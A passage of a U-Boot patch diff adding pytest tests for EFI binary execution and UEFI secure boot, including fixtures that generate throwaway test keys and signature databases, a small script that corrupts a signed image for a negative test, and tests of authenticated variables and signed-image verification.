+@pytest.mark.buildconfigspec('cmd_bootefi_hello_compile') +def test_efi_helloworld_net(u_boot_console): + """Run the helloworld.efi binary via TFTP. + + The helloworld.efi file is downloaded from the TFTP server and is executed + using the fallback device tree at $fdtcontroladdr. + """ + + addr = fetch_tftp_file(u_boot_console, 'env__efi_loader_helloworld_file') + + output = u_boot_console.run_command('bootefi %x' % addr) + expected_text = 'Hello, world' + assert expected_text in output + expected_text = '## Application failed' + assert expected_text not in output + +@pytest.mark.buildconfigspec('cmd_bootefi_hello') +def test_efi_helloworld_builtin(u_boot_console): + """Run the builtin helloworld.efi binary. + + The helloworld.efi file is included in U-Boot, execute it using the + special "bootefi hello" command. + """ + + output = u_boot_console.run_command('bootefi hello') + expected_text = 'Hello, world' + assert expected_text in output + +@pytest.mark.buildconfigspec('of_control') +@pytest.mark.buildconfigspec('cmd_bootefi') +def test_efi_grub_net(u_boot_console): + """Run the grub.efi binary via TFTP. + + The grub.efi file is downloaded from the TFTP server and gets + executed. + """ + + addr = fetch_tftp_file(u_boot_console, 'env__efi_loader_grub_file') + + u_boot_console.run_command('bootefi %x' % addr, wait_for_prompt=False) + + # Verify that we have an SMBIOS table + check_smbios = u_boot_console.config.env.get('env__efi_loader_check_smbios', False) + if check_smbios: + u_boot_console.wait_for('grub>') + u_boot_console.run_command('lsefisystab', wait_for_prompt=False, wait_for_echo=False) + u_boot_console.wait_for('SMBIOS') + + # Then exit cleanly + u_boot_console.wait_for('grub>') + u_boot_console.run_command('exit', wait_for_prompt=False, wait_for_echo=False) + u_boot_console.wait_for(u_boot_console.prompt) + # And give us our U-Boot prompt back + u_boot_console.run_command('') diff --git a/test/py/tests/test_efi_secboot/conftest.py b/test/py/tests/test_efi_secboot/conftest.py new file mode 100644 index 00000000000..ff7ac7c8101 --- /dev/null +++ b/test/py/tests/test_efi_secboot/conftest.py @@ -0,0 +1,244 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""Fixture for UEFI secure boot test.""" + +from subprocess import call, check_call, CalledProcessError +import pytest +from defs import * + +@pytest.fixture(scope='session') +def efi_boot_env(request, u_boot_config): + """Set up a file system to be used in UEFI secure boot test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A path to disk image to be used for testing + """ + image_path = u_boot_config.persistent_data_dir + image_path = image_path + '/test_efi_secboot.img' + + try: + mnt_point = u_boot_config.build_dir + '/mnt_efisecure' + check_call('rm -rf {}'.format(mnt_point), shell=True) + check_call('mkdir -p {}'.format(mnt_point), shell=True) + + # suffix + # *.key: RSA private key in PEM + # *.crt: X509 certificate (self-signed) in PEM + # *.esl: signature list + # *.hash: message digest of image as signature list + # *.auth: signed signature list in signature database format + # *.efi: UEFI image + # *.efi.signed: signed UEFI image + + # Create signature database + # PK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_PK/ -keyout PK.key -out PK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s PK.crt PK.esl; %ssign-efi-sig-list -t "2020-04-01" -c PK.crt -k PK.key PK PK.esl PK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # PK_null for deletion + check_call('cd %s; touch PK_null.esl; %ssign-efi-sig-list -t "2020-04-02" -c PK.crt -k PK.key PK PK_null.esl PK_null.auth' + % (mnt_point, EFITOOLS_PATH), shell=True) + # KEK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_KEK/ -keyout KEK.key -out KEK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s KEK.crt KEK.esl; %ssign-efi-sig-list -t "2020-04-03" -c PK.crt -k PK.key KEK KEK.esl KEK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # db + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_db/ -keyout db.key -out db.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s db.crt db.esl; %ssign-efi-sig-list -t "2020-04-04" -c KEK.crt -k KEK.key db db.esl db.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # db1 + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_db1/ -keyout db1.key -out db1.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s db1.crt db1.esl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key db db1.esl db1.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx (TEST_dbx certificate) + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_dbx/ -keyout dbx.key -out dbx.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s dbx.crt dbx.esl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx.esl dbx.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx_hash (digest of TEST_db certificate) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 256 db.crt dbx_hash.crl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx_hash.crl dbx_hash.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 384 db.crt dbx_hash384.crl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx_hash384.crl dbx_hash384.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 512 db.crt dbx_hash512.crl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx_hash512.crl dbx_hash512.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx_hash1 (digest of TEST_db1 certificate) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 256 db1.crt dbx_hash1.crl; %ssign-efi-sig-list -t "2020-04-06" -c KEK.crt -k KEK.key dbx dbx_hash1.crl dbx_hash1.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx_db (with TEST_db certificate) + check_call('cd %s; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx db.esl dbx_db.auth' + % (mnt_point, EFITOOLS_PATH), + shell=True) + + # Copy image + check_call('cp %s/lib/efi_loader/helloworld.efi %s' % + (u_boot_config.build_dir, mnt_point), shell=True) + + # Sign image + check_call('cd %s; sbsign --key db.key --cert db.crt helloworld.efi' + % mnt_point, shell=True) + # Sign already-signed image with another key + check_call('cd %s; sbsign --key db1.key --cert db1.crt --output helloworld.efi.signed_2sigs helloworld.efi.signed' + % mnt_point, shell=True) + # Create a corrupted signed image + check_call('cd %s; sh %s/test/py/tests/test_efi_secboot/forge_image.sh helloworld.efi.signed helloworld_forged.efi.signed' + % (mnt_point, u_boot_config.source_dir), shell=True) + # Digest image + check_call('cd %s; %shash-to-efi-sig-list helloworld.efi db_hello.hash; %ssign-efi-sig-list -t "2020-04-07" -c KEK.crt -k KEK.key db db_hello.hash db_hello.auth' + % (mnt_point, EFITOOLS_PATH, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %shash-to-efi-sig-list helloworld.efi.signed db_hello_signed.hash; %ssign-efi-sig-list -t "2020-04-03" -c KEK.crt -k KEK.key db db_hello_signed.hash db_hello_signed.auth' + % (mnt_point, EFITOOLS_PATH, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %ssign-efi-sig-list -t "2020-04-07" -c KEK.crt -k KEK.key dbx db_hello_signed.hash dbx_hello_signed.auth' + % (mnt_point, EFITOOLS_PATH), + shell=True) + + check_call('virt-make-fs --partition=gpt --size=+1M --type=vfat {} {}'.format( + mnt_point, image_path), shell=True) + check_call('rm -rf {}'.format(mnt_point), shell=True) + + except CalledProcessError as exception: + pytest.skip('Setup failed: %s' % exception.cmd) + return + else: + yield image_path + finally: + call('rm -f %s' % image_path, shell=True) + +# +# Fixture for UEFI secure boot test of intermediate certificates +# + + +@pytest.fixture(scope='session') +def efi_boot_env_intca(request, u_boot_config): + """Set up file system for secure boot test. + + Set up a file system to be used in UEFI secure boot test + of intermediate certificates. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A path to disk image to be used for testing + """ + image_path = u_boot_config.persistent_data_dir + image_path = image_path + '/test_efi_secboot_intca.img' + + try: + mnt_point = u_boot_config.persistent_data_dir + '/mnt_efi_secboot_intca' + check_call('rm -rf {}'.format(mnt_point), shell=True) + check_call('mkdir -p {}'.format(mnt_point), shell=True) + + # Create signature database + # PK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_PK/ -keyout PK.key -out PK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s PK.crt PK.esl; %ssign-efi-sig-list -c PK.crt -k PK.key PK PK.esl PK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # KEK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_KEK/ -keyout KEK.key -out KEK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s KEK.crt KEK.esl; %ssign-efi-sig-list -c PK.crt -k PK.key KEK KEK.esl KEK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + + # We will have three-tier hierarchy of certificates: + # TestRoot: Root CA (self-signed) + # TestSub: Intermediate CA (signed by Root CA) + # TestCert: User certificate (signed by Intermediate CA, and used + # for signing an image) + # + # NOTE: + # I consulted the following EDK2 document for certificate options: + # BaseTools/Source/Python/Pkcs7Sign/Readme.md + # Please not use them as they are in product system. They are + # for test purpose only. + + # TestRoot + check_call('cp %s/test/py/tests/test_efi_secboot/openssl.cnf %s' + % (u_boot_config.source_dir, mnt_point), shell=True) + check_call('cd %s; export OPENSSL_CONF=./openssl.cnf; openssl genrsa -out TestRoot.key 2048; openssl req -extensions v3_ca -new -x509 -days 365 -key TestRoot.key -out TestRoot.crt -subj "/CN=TEST_root/"; touch index.txt; touch index.txt.attr' + % mnt_point, shell=True) + # TestSub + check_call('cd %s; touch serial.new; export OPENSSL_CONF=./openssl.cnf; openssl genrsa -out TestSub.key 2048; openssl req -new -key TestSub.key -out TestSub.csr -subj "/CN=TEST_sub/"; openssl ca -in TestSub.csr -out TestSub.crt -extensions v3_int_ca -days 365 -batch -rand_serial -cert TestRoot.crt -keyfile TestRoot.key' + % mnt_point, shell=True) + # TestCert + check_call('cd %s; touch serial.new; export OPENSSL_CONF=./openssl.cnf; openssl genrsa -out TestCert.key 2048; openssl req -new -key TestCert.key -out TestCert.csr -subj "/CN=TEST_cert/"; openssl ca -in TestCert.csr -out TestCert.crt -extensions usr_cert -days 365 -batch -rand_serial -cert TestSub.crt -keyfile TestSub.key' + % mnt_point, shell=True) + # db + # for TestCert + check_call('cd %s; %scert-to-efi-sig-list -g %s TestCert.crt TestCert.esl; %ssign-efi-sig-list -c KEK.crt -k KEK.key db TestCert.esl db_a.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestSub + check_call('cd %s; %scert-to-efi-sig-list -g %s TestSub.crt TestSub.esl; %ssign-efi-sig-list -t "2020-07-16" -c KEK.crt -k KEK.key db TestSub.esl db_b.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestRoot + check_call('cd %s; %scert-to-efi-sig-list -g %s TestRoot.crt TestRoot.esl; %ssign-efi-sig-list -t "2020-07-17" -c KEK.crt -k KEK.key db TestRoot.esl db_c.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + ## dbx (hash of certificate with revocation time) + # for TestCert + check_call('cd %s; %scert-to-efi-hash-list -g %s -t "2020-07-20" -s 256 TestCert.crt TestCert.crl; %ssign-efi-sig-list -c KEK.crt -k KEK.key dbx TestCert.crl dbx_a.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestSub + check_call('cd %s; %scert-to-efi-hash-list -g %s -t "2020-07-21" -s 256 TestSub.crt TestSub.crl; %ssign-efi-sig-list -t "2020-07-18" -c KEK.crt -k KEK.key dbx TestSub.crl dbx_b.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestRoot + check_call('cd %s; %scert-to-efi-hash-list -g %s -t "2020-07-22" -s 256 TestRoot.crt TestRoot.crl; %ssign-efi-sig-list -t "2020-07-19" -c KEK.crt -k KEK.key dbx TestRoot.crl dbx_c.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + + # Sign image + # additional intermediate certificates may be included + # in SignedData + + check_call('cp %s/lib/efi_loader/helloworld.efi %s' % + (u_boot_config.build_dir, mnt_point), shell=True) + # signed by TestCert + check_call('cd %s; %ssbsign --key TestCert.key --cert TestCert.crt --out helloworld.efi.signed_a helloworld.efi' + % (mnt_point, SBSIGN_PATH), shell=True) + # signed by TestCert with TestSub in signature + check_call('cd %s; %ssbsign --key TestCert.key --cert TestCert.crt --addcert TestSub.crt --out helloworld.efi.signed_ab helloworld.efi' + % (mnt_point, SBSIGN_PATH), shell=True) + # signed by TestCert with TestSub and TestRoot in signature + check_call('cd %s; cat TestSub.crt TestRoot.crt > TestSubRoot.crt; %ssbsign --key TestCert.key --cert TestCert.crt --addcert TestSubRoot.crt --out helloworld.efi.signed_abc helloworld.efi' + % (mnt_point, SBSIGN_PATH), shell=True) + + check_call('virt-make-fs --partition=gpt --size=+1M --type=vfat {} {}'.format(mnt_point, image_path), shell=True) + check_call('rm -rf {}'.format(mnt_point), shell=True) + + except CalledProcessError as e: + pytest.skip('Setup failed: %s' % e.cmd) + return + else: + yield image_path + finally: + call('rm -f %s' % image_path, shell=True) diff --git a/test/py/tests/test_efi_secboot/defs.py b/test/py/tests/test_efi_secboot/defs.py new file mode 100644 index 00000000000..6a2317e295b --- /dev/null +++ b/test/py/tests/test_efi_secboot/defs.py @@ -0,0 +1,16 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Constants used for secure boot test.""" + +# Owner guid +GUID = '11111111-2222-3333-4444-123456789abc' + +# v1.5.1 or earlier of efitools has a bug in sha256 calculation, and +# you need build a newer version on your own. +# The path must terminate with '/'. +EFITOOLS_PATH = '' + +# "--addcert" option of sbsign must be available, otherwise +# you need build a newer version on your own. +# The path must terminate with '/'. +SBSIGN_PATH = '' diff --git a/test/py/tests/test_efi_secboot/forge_image.sh b/test/py/tests/test_efi_secboot/forge_image.sh new file mode 100644 index 00000000000..2465d10fa7b --- /dev/null +++ b/test/py/tests/test_efi_secboot/forge_image.sh @@ -0,0 +1,5 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +#!/bin/sh + +replace_exp="s/H\0e\0l\0l\0o\0/h\0E\0L\0L\0O\0/g" +perl -p -e ${replace_exp} < $1 > $2 diff --git a/test/py/tests/test_efi_secboot/openssl.cnf b/test/py/tests/test_efi_secboot/openssl.cnf new file mode 100644 index 00000000000..f684f1df7e6 --- /dev/null +++ b/test/py/tests/test_efi_secboot/openssl.cnf @@ -0,0 +1,48 @@ +[ ca ] +default_ca = CA_default + +[ CA_default ] +new_certs_dir = . +database = ./index.txt +serial = ./serial +default_md = sha256 +policy = policy_min + +[ req ] +distinguished_name = def_distinguished_name + +[def_distinguished_name] + +# Extensions +# -addext " ... = ..." +# +[ v3_ca ] + # Extensions for a typical Root CA. + basicConstraints = critical,CA:TRUE + keyUsage = critical, digitalSignature, cRLSign, keyCertSign + subjectKeyIdentifier = hash + authorityKeyIdentifier = keyid:always,issuer + +[ v3_int_ca ] + # Extensions for a typical intermediate CA. + basicConstraints = critical, CA:TRUE + keyUsage = critical, digitalSignature, cRLSign, keyCertSign + subjectKeyIdentifier = hash + authorityKeyIdentifier = keyid:always,issuer + +[ usr_cert ] + # Extensions for user end certificates. + basicConstraints = CA:FALSE + keyUsage = critical, nonRepudiation, digitalSignature, keyEncipherment + extendedKeyUsage = clientAuth, emailProtection + subjectKeyIdentifier = hash + authorityKeyIdentifier = keyid,issuer + +[ policy_min ] + countryName = optional + stateOrProvinceName = optional + localityName = optional + organizationName = optional + organizationalUnitName = optional + commonName = supplied + emailAddress = optional diff --git a/test/py/tests/test_efi_secboot/test_authvar.py b/test/py/tests/test_efi_secboot/test_authvar.py new file mode 100644 index 00000000000..f99b8270a64 --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_authvar.py @@ -0,0 +1,281 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Variable Authentication Test + +""" +This test verifies variable authentication +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiAuthVar(object): + def test_efi_var_auth1(self, u_boot_console, efi_boot_env): + """ + Test Case 1 - Install signature database + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 1a'): + # Test Case 1a, Initial secure state + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'printenv -e SecureBoot']) + assert '00000000: 00' in ''.join(output) + + output = u_boot_console.run_command( + 'printenv -e SetupMode') + assert '00000000: 01' in output + + with u_boot_console.log.section('Test Case 1b'): + # Test Case 1b, PK without AUTHENTICATED_WRITE_ACCESS + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' in ''.join(output) + + with u_boot_console.log.section('Test Case 1c'): + # Test Case 1c, install PK + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'printenv -e -n PK']) + assert 'PK:' in ''.join(output) + + output = u_boot_console.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + output = u_boot_console.run_command( + 'printenv -e SetupMode') + assert '00000000: 00' in output + + with u_boot_console.log.section('Test Case 1d'): + # Test Case 1d, db/dbx without KEK + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' in ''.join(output) + + with u_boot_console.log.section('Test Case 1e'): + # Test Case 1e, install KEK + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize KEK']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'printenv -e -n KEK']) + assert 'KEK:' in ''.join(output) + + output = u_boot_console.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + + with u_boot_console.log.section('Test Case 1f'): + # Test Case 1f, install db + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = u_boot_console.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + + with u_boot_console.log.section('Test Case 1g'): + # Test Case 1g, install dbx + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 dbx.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 dbx.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'dbx:' in ''.join(output) + + output = u_boot_console.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + + def test_efi_var_auth2(self, u_boot_console, efi_boot_env): + """ + Test Case 2 - Update database by overwriting + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 2a'): + # Test Case 2a, update without AUTHENTICATED_WRITE_ACCESS + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with u_boot_console.log.section('Test Case 2b'): + # Test Case 2b, update without correct signature + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.esl', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with u_boot_console.log.section('Test Case 2c'): + # Test Case 2c, update with correct signature + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + def test_efi_var_auth3(self, u_boot_console, efi_boot_env): + """ + Test Case 3 - Append database + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 3a'): + # Test Case 3a, update without AUTHENTICATED_WRITE_ACCESS + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -a -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with u_boot_console.log.section('Test Case 3b'): + # Test Case 3b, update without correct signature + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.esl', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with u_boot_console.log.section('Test Case 3c'): + # Test Case 3c, update with correct signature + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + def test_efi_var_auth4(self, u_boot_console, efi_boot_env): + """ + Test Case 4 - Delete database without authentication + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 4a'): + # Test Case 4a, update without AUTHENTICATED_WRITE_ACCESS + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'setenv -e -nv -bs -rt db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' in ''.join(output) + assert 'db:' in ''.join(output) + + with u_boot_console.log.section('Test Case 4b'): + # Test Case 4b, update without correct signature/data + output = u_boot_console.run_command_list([ + 'setenv -e -nv -bs -rt -at db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' in ''.join(output) + assert 'db:' in ''.join(output) + + def test_efi_var_auth5(self, u_boot_console, efi_boot_env): + """ + Test Case 5 - Uninstall(delete) PK + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 5a'): + # Test Case 5a, Uninstall PK without correct signature + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'PK:' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 PK_null.esl', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'printenv -e -n PK']) + assert 'Failed to set EFI variable' in ''.join(output) + assert 'PK:' in ''.join(output) + + with u_boot_console.log.section('Test Case 5b'): + # Test Case 5b, Uninstall PK with correct signature + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 PK_null.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'printenv -e -n PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert '\"PK\" not defined' in ''.join(output) + + output = u_boot_console.run_command( + 'printenv -e SecureBoot') + assert '00000000: 00' in output + output = u_boot_console.run_command( + 'printenv -e SetupMode') + assert '00000000: 01' in output diff --git a/test/py/tests/test_efi_secboot/test_signed.py b/test/py/tests/test_efi_secboot/test_signed.py new file mode 100644 index 00000000000..2f862a259ad --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_signed.py @@ -0,0 +1,371 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Signed Image Authentication Test + +""" +This test verifies image authentication for signed images. +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiSignedImage(object): + def test_efi_signed_image_auth1(self, u_boot_console, efi_boot_env): + """ + Test Case 1 - Secure boot is not in force + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 1a'): + # Test Case 1a, run signed image if no PK + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'efidebug boot add -b 1 HELLO1 host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + with u_boot_console.log.section('Test Case 1b'): + # Test Case 1b, run unsigned image if no PK + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 2 HELLO2 host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 2', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + def test_efi_signed_image_auth2(self, u_boot_console, efi_boot_env): + """ + Test Case 2 - Secure boot is in force, + authenticated by db (TEST_db certificate in db) + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 2a'): + # Test Case 2a, db is not yet installed + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot 